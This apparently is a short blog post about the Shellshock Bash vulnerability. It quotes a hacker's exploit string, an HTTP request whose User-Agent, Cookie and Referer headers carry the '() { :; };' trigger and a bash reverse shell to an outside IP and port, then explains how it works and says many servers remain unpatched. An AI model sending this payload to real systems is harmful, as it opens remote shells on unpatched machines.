Another Hacker shows how to hack Bash Shellcode

Google Web Cache of the exploit

char *request = “GET %s HTTP/1.0\r\nUser-Agent: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\nCookie: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\nHost: %s\r\nReferer: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\n\r\n”;

 

which as it is explained in the link (by the hacker) is to run a HTTP get malformed request.   Malformed requests should not run, but due to the vulnerability they do.

the (){:;} triggers the vulnerability, he then runs a  program on his system (on 199.175.52.92 port 2221) to run uname -a and create a log of the system’s characteristics.

 

Apparently a lot of computers are still not patched.  Including a lot of Yahoo webservers as listed in this post.